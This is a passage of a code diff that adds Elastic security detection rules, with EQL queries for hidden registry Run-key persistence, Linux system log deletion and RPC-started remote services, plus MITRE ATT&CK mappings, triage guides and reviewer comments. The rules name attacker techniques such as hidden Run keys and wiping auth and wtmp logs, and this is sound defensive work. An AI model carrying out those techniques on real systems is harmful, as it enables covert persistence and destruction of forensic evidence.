Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + 
"name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 107 + }, + "id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_108.json b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_108.json new file mode 100644 index 00000000000..4a0b080b6d1 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/a9b05c3b-b304-4bf9-970d-acdfaef2944c_108.json 
@@ -0,0 +1,119 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a persistence mechanism that utilizes the NtSetValueKey native API to create a hidden (null terminated) registry key. An adversary may use this method to hide from system utilities such as the Registry Editor (regedit).", + "from": "now-9m", + "index": [ + "logs-endpoint.events.registry-*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Persistence via Hidden Run Key Detected", + "query": "/* Registry Path ends with backslash */\nregistry where host.os.type == \"windows\" and /* length(registry.data.strings) > 0 and */\n registry.path : (\"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKLM\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"HKU\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run\\\\\")\n", + "references": [ + 
"https://github.com/outflanknl/SharpHide", + "https://github.com/ewhitehats/InvisiblePersistence/blob/master/InvisibleRegValues_Whitepaper.pdf" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.001", + "name": "Registry Run Keys / Startup Folder", + "reference": "https://attack.mitre.org/techniques/T1547/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + 
"name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "a9b05c3b-b304-4bf9-970d-acdfaef2944c_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_110.json b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_110.json new file mode 100644 index 00000000000..295377c13f7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/aa895aea-b69c-4411-b110-8d7599634b30_110.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of sensitive Linux system logs. This may indicate an attempt to evade detection or destroy forensic evidence on a system.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "System Log File Deletion", + "query": "file where host.os.type == \"linux\" and event.type == \"deletion\" and\n file.path :\n (\n \"/var/run/utmp\",\n \"/var/log/wtmp\",\n \"/var/log/btmp\",\n \"/var/log/lastlog\",\n \"/var/log/faillog\",\n \"/var/log/syslog\",\n \"/var/log/messages\",\n \"/var/log/secure\",\n \"/var/log/auth.log\",\n \"/var/log/boot.log\",\n \"/var/log/kern.log\"\n ) and\n not process.name in (\"gzip\", \"executor\", \"dockerd\")\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/11/live-off-the-land-an-overview-of-unc1945.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "aa895aea-b69c-4411-b110-8d7599634b30", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.002", + "name": "Clear Linux or Mac System Logs", + "reference": "https://attack.mitre.org/techniques/T1070/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "aa895aea-b69c-4411-b110-8d7599634b30_110", + "type": "security-rule" +} \ No newline at end of file 
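Review bot: The process exclusion that closes the query, `not process.name in ("gzip", "executor", "dockerd")`, is keyed on `process.name` alone, so any process carrying one of those names is exempt from the rule no matter where it runs from; matching on `process.executable` (name plus its expected path) would keep the exclusion as narrow as it is meant to be. The `index` list covers `auditbeat-*` and `endgame-*` while `related_integrations` declares only `endpoint`, which is worth confirming against the package's other rules since the setup text explicitly names Auditbeat as a supported source. In that setup text the beat is spelled "auditbeats" (`like auditbeats/filebeat/winlogbeat etc.`) where the product name is Auditbeat.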
diff --git a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_110.json b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_110.json new file mode 100644 index 00000000000..665c0d488be --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_110.json 
@@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote execution of Windows services over remote procedure call (RPC). This could be indicative of lateral movement, but will be noisy if commonly done by administrators.\"", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remotely Started Services via RPC", + "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned 
Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"/V\") and\n not process.executable : (\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\ccmsetup\\\\ccmsetup.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\srmhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\",\n 
\"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\"\n )] by host.id, process.parent.entity_id\n", + "references": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "aa9a274d-6b53-424d-ac5e-cb8ca4251650", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Lateral 
Movement", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [ + { + "id": "T1021", + "name": "Remote Services", + "reference": "https://attack.mitre.org/techniques/T1021/" + } + ] + } + ], + "type": "eql", + "version": 110 + }, + "id": "aa9a274d-6b53-424d-ac5e-cb8ca4251650_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_111.json b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_111.json new file mode 100644 index 00000000000..3632c85ba09 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/aa9a274d-6b53-424d-ac5e-cb8ca4251650_111.json 
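Review bot: The last bullet of "Possible investigation steps" in `note` ends with `to the target host after the registry modification.`, which does not fit this rule — the query correlates a `services.exe` inbound TCP connection with a child-process start and never touches the registry — and reads as pasted from another guide; `after the remote service start` would match what the query detects. The `process.executable` exclusion list also contains `?:\\Pella Corporation\\Pella Order Management\\GPAutoSvc.exe` twice, and the `?:\\Program Files\\*.exe` / `?:\\Program Files (x86)\\*.exe` entries exempt every executable under those trees, a coverage gap broad enough to deserve a sentence in the "False positive analysis" section so operators know it exists. The same guide text and exclusion list appear unchanged in the `_111.json` hunk below; this `_110.json` copy additionally ends its `description` with a stray escaped quote (`administrators.\"`) that the `_111.json` copy drops, presumably retained deliberately as the historical version.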
@@ -0,0 +1,137 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies remote execution of Windows services over remote procedure call (RPC). This could be indicative of lateral movement, but will be noisy if commonly done by administrators.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*", + "winlogbeat-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remotely Started Services via RPC", + "note": "## Triage and analysis\n\n### Investigating Remotely Started Services via RPC\n\nThe Service Control Manager Remote Protocol is a client/server protocol used for configuring and controlling service programs running on a remote computer. A remote service management session begins with the client initiating the connection request to the server. If the server grants the request, the connection is established. The client can then make multiple requests to modify, query the configuration, or start and stop services on the server by using the same session until the session is terminated.\n\nThis rule detects the remote creation or start of a service by correlating a `services.exe` network connection and the spawn of a child process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Review login events (e.g., 4624) in the alert timeframe to identify the account used to perform this action. Use the `source.address` field to help identify the source system.\n- Review network events from the source system using the source port identified on the alert and try to identify the program used to initiate the action.\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned 
Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- Remote management software like SCCM may trigger this rule. If noisy on your environment, consider adding exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence with maxspan=1s\n [network where host.os.type == \"windows\" and process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and\n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n [process where host.os.type == \"windows\" and \n event.type == \"start\" and process.parent.name : \"services.exe\" and\n not (process.executable : \"?:\\\\Windows\\\\System32\\\\msiexec.exe\" and process.args : \"/V\") and\n not process.executable : (\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\ccmsetup\\\\ccmsetup.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\srmhost.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\",\n 
\"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\"\n )] by host.id, process.parent.entity_id\n", + "references": [ + "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-scmr/705b624a-13de-43cc-b8a2-99573da3635f" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": 